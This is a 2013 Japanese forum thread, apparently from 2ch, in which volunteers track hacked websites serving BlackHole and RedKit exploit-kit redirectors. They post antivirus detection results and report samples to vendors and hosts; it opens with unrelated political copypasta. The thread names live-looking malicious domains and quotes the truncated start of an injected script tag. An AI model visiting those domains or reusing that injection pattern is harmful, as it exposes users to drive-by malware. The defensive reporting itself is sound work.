討論で相手の愛国度をはかるのが愛国者 討論で相手を売国奴扱いするのがネトウヨ
君が代をきちんと歌えるのが愛国者 気味が悪いほどネットで吠えるのがネトウヨ
家族思いなのが愛国者 家族の重荷になっているのがネトウヨ
社会に出て一人前なのが愛国者 2ちゃんねるでだけ一人前なのがネトウヨ
日本の歴史と政治に学が深いのが愛国者 2ちゃんの書き込みとレスが不快なのがネトウヨ
日本人が逮捕されると残念だと嘆くのが愛国者 日本人が逮捕されると通名だとわめくのがネトウヨ
日本の事を敬虔(けいけん)に思っているのが愛国者 自分の事を聖戦士だと思っているのがネトウヨ
投票で清き一票を入れるのが愛国者 妄想でキモい文章を作るのがネトウヨ
34 :名無しさん@お腹いっぱい。:2013/03/19(火) 18:59:38.91
私は
一庶民
カスミソウの様に
密やかに
一庶民
カスミソウの様に
密やかに
35 :/名無しさん[1-30] ◆.htmlint.U :2013/03/19(火) 22:51:36.29
>29 VTで検出されるよーになたー
難読化されたScript
BitDefender JS:Trojan.Crypt.MF
F-Secure JS:Trojan.Crypt.MF
GData JS:Trojan.Crypt.MF
Ikarus Exploit.JS.Blacole
MicroWorld-eScan JS:Trojan.Crypt.MF
nProtect JS:Trojan.Crypt.MF
呼び先のphp
Microsoft Exploit:JS/Blacole.GB
Sophos Mal/ExpJS-N
こっからさきは逝けんかった
ESETとひげおぢさんからめる
ESET
JS/Kryptik.AII trojan
JS/Kryptik.AIK trojan
JS/Exploit.Agent.NEO trojan
ひげおぢさん
Trojan-Downloader.JS.DarDuk.lb
CsideNet様から受領のお返事来てました。
VTとかが反応してきたので対応されるかと思ふぽ
頻繁に更新してるようですが
ドメインがSPAM扱いされてるようになったみたいで、検体メルで送り辛い ><;
難読化されたScript
BitDefender JS:Trojan.Crypt.MF
F-Secure JS:Trojan.Crypt.MF
GData JS:Trojan.Crypt.MF
Ikarus Exploit.JS.Blacole
MicroWorld-eScan JS:Trojan.Crypt.MF
nProtect JS:Trojan.Crypt.MF
呼び先のphp
Microsoft Exploit:JS/Blacole.GB
Sophos Mal/ExpJS-N
こっからさきは逝けんかった
ESETとひげおぢさんからめる
ESET
JS/Kryptik.AII trojan
JS/Kryptik.AIK trojan
JS/Exploit.Agent.NEO trojan
ひげおぢさん
Trojan-Downloader.JS.DarDuk.lb
CsideNet様から受領のお返事来てました。
VTとかが反応してきたので対応されるかと思ふぽ
頻繁に更新してるようですが
ドメインがSPAM扱いされてるようになったみたいで、検体メルで送り辛い ><;
36 :名無しさん@お腹いっぱい。:2013/03/19(火) 23:16:40.31
あげ
37 :/名無しさん[1-30] ◆.htmlint.U :2013/03/19(火) 23:17:14.39
あびらからもきてた>35
JS/Expy.B〜F
JS/Expy.B〜F
38 :名無しさん@お腹いっぱい。:2013/03/20(水) 05:36:32.81
>>35
乙でし。
>Last-Modified: Tue, 19 Mar 2013 12:42:23 GMT
>Last-Modified: Tue, 19 Mar 2013 13:27:15 GMT
凄い勢いで更新?
※電話がボボンで代行依頼 orz ありがとう代行さん...
乙でし。
>Last-Modified: Tue, 19 Mar 2013 12:42:23 GMT
>Last-Modified: Tue, 19 Mar 2013 13:27:15 GMT
凄い勢いで更新?
※電話がボボンで代行依頼 orz ありがとう代行さん...
39 :/名無しさん[1-30] ◆.htmlint.U :2013/03/20(水) 10:28:12.53
>>38
お疲れ様です
4種類ぐらいのScriptが繰り返し交互に変わっているようです
happy-lemon、apmsolucionesweb、speciaalaangepast、vedelaar
んでそれぞれさらに違うとこへ誘導
ipodのとこには古い8080が(ry
お疲れ様です
4種類ぐらいのScriptが繰り返し交互に変わっているようです
happy-lemon、apmsolucionesweb、speciaalaangepast、vedelaar
んでそれぞれさらに違うとこへ誘導
ipodのとこには古い8080が(ry
40 :名無しさん@お腹いっぱい。:2013/03/30(土) 14:13:02.89
ぼぼん解除てすt
41 :/名無しさん[1-30] ◆.htmlint.U :2013/04/02(火) 13:51:31.47
>>24のRedKitの中間Scriptが難読化した
現状まかひのみ対応
File type: HTML
Detection ratio: 2 / 46
McAfee Exploit-Rekit.f 20130402
McAfee-GW-Edition Exploit-Rekit.f 20130402
現状まかひのみ対応
File type: HTML
Detection ratio: 2 / 46
McAfee Exploit-Rekit.f 20130402
McAfee-GW-Edition Exploit-Rekit.f 20130402
42 :/名無しさん[1-30] ◆.htmlint.U :2013/04/08(月) 06:13:13.78
Exploit Kit が設置されてたはずのサイトへ逝ってみた
トップページには
> Hacked By CompLeXx* & XIX
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
トップページには
> Hacked By CompLeXx* & XIX
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
43 :名無しさん@お腹いっぱい。:2013/04/12(金) 12:04:59.79
Trojan-Downloader.Win32.Karagany
新KwバルスECM:
90 34 00 00 21 00 17 02 0d ee 0c 56 5d 8a 9a 88 20 3c 69 26 e0 70 c0 dc 5c 04 15 de c8 a2 9f 0d be 5a 1b d8 e1 98 00
timeta70bledeva.rr.nu
https://www.virustotal.com/ja/url/ad520632542fa49f1a301af12c75b47925bedccc5f7964872dfbdc4b7938a52c/analysis/1364931178/
Mal/HTMLGen-A
n8vlzd5e9h.diipl.com
https://www.virustotal.com/ja/url/ed70555e53241290b281985d0988ca0f8e8f898ee5d465f817ae966d0c124752/analysis/1364931361/
Mal/HTMLGen-A
https://www.virustotal.com/ja/url/a03758a568622c159348ce323beb9085367ed71afde257162b10a40528cb7007/analysis/1364931554/
ESET Malware site
Google Safebrowsing Malware site
新KwバルスECM:
90 34 00 00 21 00 17 02 0d ee 0c 56 5d 8a 9a 88 20 3c 69 26 e0 70 c0 dc 5c 04 15 de c8 a2 9f 0d be 5a 1b d8 e1 98 00
timeta70bledeva.rr.nu
https://www.virustotal.com/ja/url/ad520632542fa49f1a301af12c75b47925bedccc5f7964872dfbdc4b7938a52c/analysis/1364931178/
Mal/HTMLGen-A
n8vlzd5e9h.diipl.com
https://www.virustotal.com/ja/url/ed70555e53241290b281985d0988ca0f8e8f898ee5d465f817ae966d0c124752/analysis/1364931361/
Mal/HTMLGen-A
https://www.virustotal.com/ja/url/a03758a568622c159348ce323beb9085367ed71afde257162b10a40528cb7007/analysis/1364931554/
ESET Malware site
Google Safebrowsing Malware site
44 :名無しさん@お腹いっぱい。:2013/04/12(金) 12:09:59.04
Google セーフ ブラウジング
このサイトは危険にさらされている可能性があります
http://www.stopforumspam.com/ipcheck/
http://support.google.com/websearch/answer/190597?hl=ja
このサイトは危険にさらされている可能性があります
http://www.stopforumspam.com/ipcheck/
http://support.google.com/websearch/answer/190597?hl=ja
45 :/名無しさん[1-30] ◆.htmlint.U :2013/04/14(日) 12:17:59.97
BlackHole Exploit Kit Redirectorだと思うけど
ランダムにExploit Kitサイトや金融系っぽいサイトに飛ばされるので新手のフィッシングかと思ってたら
自分でも知ってるbloombergにも逝っちゃた
どうやらノーマルなサイトと混ぜて飛ばされるみたい
金融系の末尾あたりに付く「LBTG」ってなんじゃろか?
株価チャートのことかなん
ランダムにExploit Kitサイトや金融系っぽいサイトに飛ばされるので新手のフィッシングかと思ってたら
自分でも知ってるbloombergにも逝っちゃた
どうやらノーマルなサイトと混ぜて飛ばされるみたい
金融系の末尾あたりに付く「LBTG」ってなんじゃろか?
株価チャートのことかなん
46 :/名無しさん[1-30] ◆.htmlint.U :2013/04/14(日) 23:58:34.38
>>45の亜種
ひげおぢさんから自動お返事の件名「[!!Spam KSE]Re: 〜」
途中誘導されてるとこの一つのアドレスが薬物(Viagra等)販売サイトなのでこーなった…
他のベンダーに届いているのか心配
>>45との共通点
:タグの文字列
:難読Script デコードめんどいからaguse最高(´∇`) gredでも確認でけるYO
:誘導先に金融系サイトが混ざっている模様。恐らく検出逃れかと
ひげおぢさんから自動お返事の件名「[!!Spam KSE]Re: 〜」
途中誘導されてるとこの一つのアドレスが薬物(Viagra等)販売サイトなのでこーなった…
他のベンダーに届いているのか心配
>>45との共通点
:タグの文字列
:難読Script デコードめんどいからaguse最高(´∇`) gredでも確認でけるYO
:誘導先に金融系サイトが混ざっている模様。恐らく検出逃れかと
47 :/名無しさん[1-30] ◆.htmlint.U :2013/04/15(月) 14:55:31.76
>>45
BitDefender Trojan.JS.Iframe.DDE 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
BitDefender Trojan.JS.Iframe.DDE 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
48 :/名無しさん[1-30] ◆.htmlint.U :2013/04/15(月) 20:39:09.74
49 :/名無しさん[1-30] ◆.htmlint.U :2013/04/16(火) 02:25:53.84
>>47
Antivirus Result Update
BitDefender Trojan.JS.Iframe.DDE 20130415
DrWeb JS.IFrame.418 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
Ikarus Trojan.JS.IFrame 20130415
Microsoft Trojan:JS/BlacoleRef.DD 20130415
MicroWorld-eScan Trojan.JS.Iframe.DDE 20130415
nProtect Trojan.JS.Iframe.DDE 20130415
TrendMicro-HouseCall TROJ_GEN.F47V0415 20130415
これくらい検出されれば、改竄されたことに気付くかなん
Antivirus Result Update
BitDefender Trojan.JS.Iframe.DDE 20130415
DrWeb JS.IFrame.418 20130415
Emsisoft Trojan.JS.Iframe.DDE (B) 20130415
F-Secure Trojan.JS.Iframe.DDE 20130415
GData Trojan.JS.Iframe.DDE 20130415
Ikarus Trojan.JS.IFrame 20130415
Microsoft Trojan:JS/BlacoleRef.DD 20130415
MicroWorld-eScan Trojan.JS.Iframe.DDE 20130415
nProtect Trojan.JS.Iframe.DDE 20130415
TrendMicro-HouseCall TROJ_GEN.F47V0415 20130415
これくらい検出されれば、改竄されたことに気付くかなん
50 :/名無しさん[1-30] ◆.htmlint.U :2013/04/16(火) 21:39:57.38
>>46
BitDefender Trojan.Script.CDK 20130416
Commtouch JS/IFrame.RS 20130416
DrWeb JS.IFrame.418 20130416
Emsisoft Trojan.Script.CDK (B) 20130416
F-Prot JS/IFrame.RS 20130416
F-Secure Trojan.Script.CDK 20130416
GData Trojan.Script.CDK 20130416
Microsoft Trojan:JS/BlacoleRef.CZ 20130416
MicroWorld-eScan Trojan.Script.CDK 20130416
nProtect Trojan.Script.CDK 20130416
Sophos Mal/Iframe-AO 20130416
TrendMicro-HouseCall TROJ_GEN.F47V0414 20130416
BitDefender Trojan.Script.CDK 20130416
Commtouch JS/IFrame.RS 20130416
DrWeb JS.IFrame.418 20130416
Emsisoft Trojan.Script.CDK (B) 20130416
F-Prot JS/IFrame.RS 20130416
F-Secure Trojan.Script.CDK 20130416
GData Trojan.Script.CDK 20130416
Microsoft Trojan:JS/BlacoleRef.CZ 20130416
MicroWorld-eScan Trojan.Script.CDK 20130416
nProtect Trojan.Script.CDK 20130416
Sophos Mal/Iframe-AO 20130416
TrendMicro-HouseCall TROJ_GEN.F47V0414 20130416
51 :/名無しさん[1-30] ◆.htmlint.U :2013/04/17(水) 00:06:12.77
52 :/名無しさん[1-30] ◆.htmlint.U :2013/04/17(水) 05:57:18.69
>>45
また変わった
パパンがパンデミック
DrWeb JS.IFrame.418 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
中間Script
McAfee Exploit-Rekit.f 20130416
Norman RedKit.B 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
BlackHoleもRedKitも同じ中間Scriptになったのかな? > Norman
また変わった
パパンがパンデミック
DrWeb JS.IFrame.418 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
中間Script
McAfee Exploit-Rekit.f 20130416
Norman RedKit.B 20130416
Microsoft Trojan:JS/BlacoleRef.DD 20130416
Norman Blacole.TB 20130416
BlackHoleもRedKitも同じ中間Scriptになったのかな? > Norman
53 :/名無しさん[1-30] ◆.htmlint.U :2013/04/18(木) 00:11:44.19
>>52増えた
BitDefender Trojan.JS.Agent.IYS 20130417
Commtouch JS/IFrame.RS.gen 20130417
DrWeb JS.IFrame.418 20130417
Emsisoft Trojan.JS.Agent.IYS (B) 20130417
F-Prot JS/IFrame.RS.gen 20130417
F-Secure Trojan.JS.Agent.IYS 20130417
GData Trojan.JS.Agent.IYS 20130417
Ikarus Trojan.JS.BlacoleRef 20130417
McAfee JS/Blacole-Redirect.aa 20130417
Microsoft Trojan:JS/BlacoleRef.DD 20130417
MicroWorld-eScan Trojan.JS.Agent.IYS 20130417
Norman Blacole.TB 20130417
nProtect Trojan.JS.Agent.IYS 20130417
TrendMicro-HouseCall TROJ_GEN.F47V0416 20130417
確認できてから三度改竄されてるけど
どんなセキュリティソフト使ってんだろ?
Fxやちょろめ、ぐぐるを使わないんだろか?
孫やほーだと警告でにゃーし
とっくの昔に直接めるしてるし
NTTPCコミュニケーションズからも通達されてるはずなんだけど。。。
ドメインがスパムとかに登録されちゃってるのかな?
Wab上での機会損失関係ない企業なぬか?
ついったーやってるっぽいんだけどにゃー
ひょっとして蜜壷?
BitDefender Trojan.JS.Agent.IYS 20130417
Commtouch JS/IFrame.RS.gen 20130417
DrWeb JS.IFrame.418 20130417
Emsisoft Trojan.JS.Agent.IYS (B) 20130417
F-Prot JS/IFrame.RS.gen 20130417
F-Secure Trojan.JS.Agent.IYS 20130417
GData Trojan.JS.Agent.IYS 20130417
Ikarus Trojan.JS.BlacoleRef 20130417
McAfee JS/Blacole-Redirect.aa 20130417
Microsoft Trojan:JS/BlacoleRef.DD 20130417
MicroWorld-eScan Trojan.JS.Agent.IYS 20130417
Norman Blacole.TB 20130417
nProtect Trojan.JS.Agent.IYS 20130417
TrendMicro-HouseCall TROJ_GEN.F47V0416 20130417
確認できてから三度改竄されてるけど
どんなセキュリティソフト使ってんだろ?
Fxやちょろめ、ぐぐるを使わないんだろか?
孫やほーだと警告でにゃーし
とっくの昔に直接めるしてるし
NTTPCコミュニケーションズからも通達されてるはずなんだけど。。。
ドメインがスパムとかに登録されちゃってるのかな?
Wab上での機会損失関係ない企業なぬか?
ついったーやってるっぽいんだけどにゃー
ひょっとして蜜壷?
54 :/名無しさん[1-30] ◆.htmlint.U :2013/04/18(木) 14:01:29.46
>>53
四度目
AntiVir JS/BlacoleRef.CZ.7 20130418
Commtouch JS/IFrame.RS.gen 20130418
DrWeb JS.IFrame.418 20130418
F-Prot JS/IFrame.RS.gen 20130418
Ikarus Trojan.JS.IFrame 20130418
McAfee JS/Blacole-Redirect.aa 20130418
Microsoft Trojan:JS/BlacoleRef.DD 20130418
Norman Blacole.TB 20130417
つーほーめる届いてなくても
いーかげん気付かないかなん
四度目
AntiVir JS/BlacoleRef.CZ.7 20130418
Commtouch JS/IFrame.RS.gen 20130418
DrWeb JS.IFrame.418 20130418
F-Prot JS/IFrame.RS.gen 20130418
Ikarus Trojan.JS.IFrame 20130418
McAfee JS/Blacole-Redirect.aa 20130418
Microsoft Trojan:JS/BlacoleRef.DD 20130418
Norman Blacole.TB 20130417
つーほーめる届いてなくても
いーかげん気付かないかなん
55 :/名無しさん[1-30] ◆.htmlint.U :2013/04/19(金) 23:48:47.87
>>54
五度目
AntiVir JS/BlacoleRef.CZ.7 20130419
BitDefender Trojan.Script.CDS 20130419
Commtouch JS/IFrame.RS.gen 20130419
DrWeb JS.IFrame.418 20130419
Emsisoft Trojan.Script.CDS (B) 20130419
F-Prot JS/IFrame.RS.gen 20130418
F-Secure Trojan.Script.CDS 20130419
GData Trojan.Script.CDS 20130419
Ikarus Trojan.JS.IFrame 20130419
McAfee JS/Blacole-Redirect.aa 20130419
McAfee-GW-Edition JS/Blacole-Redirect.aa 20130419
Microsoft Trojan:JS/BlacoleRef.DD 20130419
MicroWorld-eScan Trojan.Script.CDS 20130419
Norman Blacole.TB 20130419
nProtect Trojan.Script.CDS 20130419
もうベンダーに送る気力がにゃい
五度目
AntiVir JS/BlacoleRef.CZ.7 20130419
BitDefender Trojan.Script.CDS 20130419
Commtouch JS/IFrame.RS.gen 20130419
DrWeb JS.IFrame.418 20130419
Emsisoft Trojan.Script.CDS (B) 20130419
F-Prot JS/IFrame.RS.gen 20130418
F-Secure Trojan.Script.CDS 20130419
GData Trojan.Script.CDS 20130419
Ikarus Trojan.JS.IFrame 20130419
McAfee JS/Blacole-Redirect.aa 20130419
McAfee-GW-Edition JS/Blacole-Redirect.aa 20130419
Microsoft Trojan:JS/BlacoleRef.DD 20130419
MicroWorld-eScan Trojan.Script.CDS 20130419
Norman Blacole.TB 20130419
nProtect Trojan.Script.CDS 20130419
もうベンダーに送る気力がにゃい
56 :/名無しさん[1-30] ◆.htmlint.U :2013/04/20(土) 00:41:15.72
こりもころころ変わるっぽい>中間Script
Sophos Troj/ExpJS-II 20130419
55ひっくるめて送った>ベンダー
Sophos Troj/ExpJS-II 20130419
55ひっくるめて送った>ベンダー
57 :/名無しさん[1-30] ◆.htmlint.U :2013/04/22(月) 01:37:02.84
>>55
七度目
Detection ratio: 2 / 46
Analysis date: 2013-04-21 16:31:34 UTC
Antivirus Result Update
McAfee JS/Exploit-Blacole.ht 20130421
Norman Blacole.TH 20130421
六度目は>>47>>49とおなじものですた
七度目
Detection ratio: 2 / 46
Analysis date: 2013-04-21 16:31:34 UTC
Antivirus Result Update
McAfee JS/Exploit-Blacole.ht 20130421
Norman Blacole.TH 20130421
六度目は>>47>>49とおなじものですた
58 :/名無しさん[1-30] ◆.htmlint.U :2013/04/22(月) 02:54:43.86
中間Script >>57
久しぶりにひげおじさん登場
Detection ratio: 18 / 46
Analysis date: 2013-04-21 17:25:00 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.7 20130421
BitDefender Trojan.JS.Agent.IYT 20130421
Commtouch JS/IFrame.RS.gen 20130420
Comodo UnclassifiedMalware 20130421
DrWeb JS.IFrame.418 20130421
Emsisoft Trojan.JS.Agent.IYT (B) 20130421
F-Prot JS/IFrame.RS.gen 20130420
F-Secure Trojan.JS.Agent.IYT 20130421
Fortinet JS/Agent.GWA!tr.dldr 20130421
GData Trojan.JS.Agent.IYT 20130421
Ikarus Trojan.JS.IFrame 20130421
Kaspersky Trojan-Downloader.JS.Agent.gwa 20130421
McAfee JS/Exploit-Blacole.eu 20130421
McAfee-GW-Edition JS/Exploit-Blacole.eu 20130421
Microsoft Trojan:JS/BlacoleRef.DD 20130421
Norman Blacole.TB 20130421
nProtect Trojan.JS.Agent.IYT 20130421
TrendMicro-HouseCall TROJ_GEN.F47V0420 20130421
単純化しちゃったのがまた出た
Detection ratio: 0 / 46
Analysis date: 2013-04-21 17:15:56 UTC
ねもい
久しぶりにひげおじさん登場
Detection ratio: 18 / 46
Analysis date: 2013-04-21 17:25:00 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.7 20130421
BitDefender Trojan.JS.Agent.IYT 20130421
Commtouch JS/IFrame.RS.gen 20130420
Comodo UnclassifiedMalware 20130421
DrWeb JS.IFrame.418 20130421
Emsisoft Trojan.JS.Agent.IYT (B) 20130421
F-Prot JS/IFrame.RS.gen 20130420
F-Secure Trojan.JS.Agent.IYT 20130421
Fortinet JS/Agent.GWA!tr.dldr 20130421
GData Trojan.JS.Agent.IYT 20130421
Ikarus Trojan.JS.IFrame 20130421
Kaspersky Trojan-Downloader.JS.Agent.gwa 20130421
McAfee JS/Exploit-Blacole.eu 20130421
McAfee-GW-Edition JS/Exploit-Blacole.eu 20130421
Microsoft Trojan:JS/BlacoleRef.DD 20130421
Norman Blacole.TB 20130421
nProtect Trojan.JS.Agent.IYT 20130421
TrendMicro-HouseCall TROJ_GEN.F47V0420 20130421
単純化しちゃったのがまた出た
Detection ratio: 0 / 46
Analysis date: 2013-04-21 17:15:56 UTC
ねもい
59 :/名無しさん[1-30] ◆.htmlint.U :2013/04/22(月) 03:12:33.02
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
スパムとかのドメインがあったもより
まかひには送れない
スパムとかのドメインがあったもより
まかひには送れない
60 :/名無しさん[1-30] ◆.htmlint.U :2013/04/23(火) 14:26:12.52
>>57
八回目…
Detection ratio: 6 / 46
Analysis date: 2013-04-23 04:15:16 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.8 20130423
DrWeb Exploit.BlackHole.182 20130423
McAfee JS/Exploit-Blacole.ht 20130423
NANO-Antivirus Trojan.Script.IFrame.bohxwi 20130423
Norman Blacole.TH 20130422
VIPRE Trojan.JS.Obfuscator.aa (v) 20130423
八回目…
Detection ratio: 6 / 46
Analysis date: 2013-04-23 04:15:16 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.8 20130423
DrWeb Exploit.BlackHole.182 20130423
McAfee JS/Exploit-Blacole.ht 20130423
NANO-Antivirus Trojan.Script.IFrame.bohxwi 20130423
Norman Blacole.TH 20130422
VIPRE Trojan.JS.Obfuscator.aa (v) 20130423
61 :/名無しさん[1-30] ◆.htmlint.U :2013/04/23(火) 21:09:58.48
> Dear *****,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> Regards,
>
> ESET Malware Response Team
いつもごめんよぉー
肝心の大ボス捕まえられなくて
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> Regards,
>
> ESET Malware Response Team
いつもごめんよぉー
肝心の大ボス捕まえられなくて
62 :/名無しさん[1-30] ◆.htmlint.U :2013/04/25(木) 01:32:09.03
これまで蜜壷状態だったとこが正常になった模様です。
お疲れ様でした。
定点観測おはり
お疲れ様でした。
定点観測おはり
63 :/名無しさん[1-30] ◆.htmlint.U :2013/04/29(月) 03:13:32.91 BE:1572252-BRZ(10111)
こんな夜中にGMOの中の人が受理してくれました>インシデント
ゴールデンなウィークですがお疲れ様です。
ありがとうございます。
この場を借りてお礼申し上げます。
ゴールデンなウィークですがお疲れ様です。
ありがとうございます。
この場を借りてお礼申し上げます。
64 :/名無しさん[1-30] ◆.htmlint.U :2013/05/05(日) 09:34:58.21
一回目
AntiVir JS/BlacoleRef.CZ.12 20130503
Avast JS:Decode-ADH [Trj] 20130504
GData JS:Decode-ADH 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
二回目
AntiVir JS/BlacoleRef.CZ.12 20130504
Avast JS:Decode-ADH [Trj] 20130504
BitDefender Trojan.JS.Iframe.DDQ 20130504
Emsisoft Trojan.JS.Iframe.DDQ (B) 20130504
F-Secure Trojan.JS.Iframe.DDQ 20130504
GData Trojan.JS.Iframe.DDQ 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
MicroWorld-eScan Trojan.JS.Iframe.DDQ 20130504
nProtect Trojan.JS.Iframe.DDQ 20130504
三回目
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
Script更新して殆どのベンダー半日もたんかった
てーてんかんそくなぬか
サイトの対応は早くても明後日、火曜日以降になるんだろーな
AntiVir JS/BlacoleRef.CZ.12 20130503
Avast JS:Decode-ADH [Trj] 20130504
GData JS:Decode-ADH 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
二回目
AntiVir JS/BlacoleRef.CZ.12 20130504
Avast JS:Decode-ADH [Trj] 20130504
BitDefender Trojan.JS.Iframe.DDQ 20130504
Emsisoft Trojan.JS.Iframe.DDQ (B) 20130504
F-Secure Trojan.JS.Iframe.DDQ 20130504
GData Trojan.JS.Iframe.DDQ 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
MicroWorld-eScan Trojan.JS.Iframe.DDQ 20130504
nProtect Trojan.JS.Iframe.DDQ 20130504
三回目
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
Script更新して殆どのベンダー半日もたんかった
てーてんかんそくなぬか
サイトの対応は早くても明後日、火曜日以降になるんだろーな
65 :/名無しさん[1-30] ◆.htmlint.U :2013/05/06(月) 04:35:47.16
>>64
> 三回目
増えた
BitDefender Trojan.JS.Iframe.DDT 20130505
Comodo UnclassifiedMalware 20130505
Emsisoft Trojan.JS.Iframe.DDT (B) 20130505
F-Secure Trojan.JS.Iframe.DDT 20130505
GData Trojan.JS.Iframe.DDT 20130505
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130505
MicroWorld-eScan Trojan.JS.Iframe.DDT 20130505
nProtect Trojan.JS.Iframe.DDT 20130505
TrendMicro-HouseCall TROJ_GEN.F47V0504 20130505
> 三回目
増えた
BitDefender Trojan.JS.Iframe.DDT 20130505
Comodo UnclassifiedMalware 20130505
Emsisoft Trojan.JS.Iframe.DDT (B) 20130505
F-Secure Trojan.JS.Iframe.DDT 20130505
GData Trojan.JS.Iframe.DDT 20130505
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130505
MicroWorld-eScan Trojan.JS.Iframe.DDT 20130505
nProtect Trojan.JS.Iframe.DDT 20130505
TrendMicro-HouseCall TROJ_GEN.F47V0504 20130505
66 :名無しさん@お腹いっぱい。:2013/05/06(月) 11:54:43.37
覚音山 西徳寺
www●saitoku●net/
iframe name=Twitter scrolling=auto・・・
競馬の予想屋
keibaky●com
<!--c3284d--><script>try{1-prototype;}catch・・・
two2readblog●com
>不正なソフトウェアには 550 trojan(s) など
wwwwwwww
www●saitoku●net/
iframe name=Twitter scrolling=auto・・・
競馬の予想屋
keibaky●com
<!--c3284d--><script>try{1-prototype;}catch・・・
two2readblog●com
>不正なソフトウェアには 550 trojan(s) など
wwwwwwww
67 :/名無しさん[1-30] ◆.htmlint.U :2013/05/06(月) 17:07:37.83
上二つGMO、ばりゅどめにつーほー
68 :/名無しさん[1-30] ◆.htmlint.U :2013/05/07(火) 22:48:30.83
別件ばぅぁー
ひげおぢさん
> Hello,
>
> New malicious software was found in the attached file. Its detection will be included in the next update.
>
> All these 4 files will be detected as Trojan-Downloader.JS.Iframe.ddg
>
> Thank you for your help.
>>64-65
なおた ヽ(´ー`)ノ
ひげおぢさん
> Hello,
>
> New malicious software was found in the attached file. Its detection will be included in the next update.
>
> All these 4 files will be detected as Trojan-Downloader.JS.Iframe.ddg
>
> Thank you for your help.
>>64-65
なおた ヽ(´ー`)ノ
69 :/名無しさん[1-30] ◆.htmlint.U :2013/05/09(木) 00:37:30.24
RedKit Exploit Kit Redirector Site 某所のJSファイル
AntiVir HTML/TwitScroll.B 20130508
Avast JS:Iframe-AML [Trj] 20130508
AVG HTML/Framer 20130508
BitDefender Trojan.Iframe.CBN 20130508
Commtouch IFrame.gen 20130508
Comodo TrojWare.JS.Iframe.FK 20130508
Emsisoft Trojan.Iframe.CBN (B) 20130508
ESET-NOD32 JS/Iframe.HH 20130508
F-Prot IFrame.gen 20130508
F-Secure Trojan.Iframe.CBN 20130508
Fortinet JS/Iframe.HH!tr 20130508
GData Trojan.Iframe.CBN 20130508
Ikarus Exploit.HTML.IframeRef 20130508
Kaspersky HEUR:Trojan.Script.Generic 20130508
McAfee JS/IFrame.gen.j 20130508
McAfee-GW-Edition JS/IFrame.gen.j 20130508
Microsoft Exploit:HTML/IframeRef.DM 20130508
MicroWorld-eScan Trojan.Iframe.CBN 20130508
NANO-Antivirus Trojan.Html.TwitScroll.bklyhq 20130508
Norman Iframe.UW 20130508
nProtect Trojan.Iframe.CBN 20130508
PCTools Trojan.Webkit 20130508
Sophos Troj/Iframe-JG 20130508
Symantec Trojan.Webkit!html 20130508
VIPRE Malware.JS.Generic (JS) 20130508
おしんさん、がむばって
AntiVir HTML/TwitScroll.B 20130508
Avast JS:Iframe-AML [Trj] 20130508
AVG HTML/Framer 20130508
BitDefender Trojan.Iframe.CBN 20130508
Commtouch IFrame.gen 20130508
Comodo TrojWare.JS.Iframe.FK 20130508
Emsisoft Trojan.Iframe.CBN (B) 20130508
ESET-NOD32 JS/Iframe.HH 20130508
F-Prot IFrame.gen 20130508
F-Secure Trojan.Iframe.CBN 20130508
Fortinet JS/Iframe.HH!tr 20130508
GData Trojan.Iframe.CBN 20130508
Ikarus Exploit.HTML.IframeRef 20130508
Kaspersky HEUR:Trojan.Script.Generic 20130508
McAfee JS/IFrame.gen.j 20130508
McAfee-GW-Edition JS/IFrame.gen.j 20130508
Microsoft Exploit:HTML/IframeRef.DM 20130508
MicroWorld-eScan Trojan.Iframe.CBN 20130508
NANO-Antivirus Trojan.Html.TwitScroll.bklyhq 20130508
Norman Iframe.UW 20130508
nProtect Trojan.Iframe.CBN 20130508
PCTools Trojan.Webkit 20130508
Sophos Troj/Iframe-JG 20130508
Symantec Trojan.Webkit!html 20130508
VIPRE Malware.JS.Generic (JS) 20130508
おしんさん、がむばって
70 :/名無しさん[1-30] ◆.htmlint.U :2013/05/11(土) 03:27:16.82
改竄サイトをホスティングにつーほーしてるなまかへ
ドメインがブロックされることが多いので、めんどいけどフォームからもつーほーしてね
ドメインがブロックされることが多いので、めんどいけどフォームからもつーほーしてね
71 :/名無しさん[1-30] ◆.htmlint.U :2013/05/12(日) 04:06:17.40
BlackHole Exploit Kit Redirector Siteの新種のScript
File type: HTML
Detection ratio: 1 / 46
Analysis date: 2013-05-11 18:18:17 UTC
Antivirus Result Update
Norman BlacoleRef.BA 20130511
んで、飛び先のひとつ
File type: HTML
Detection ratio: 6 / 46
Analysis date: 2013-05-11 18:39:21 UTC
Antivirus Result Update
BitDefender Trojan.Html.Fakealert.P 20130511
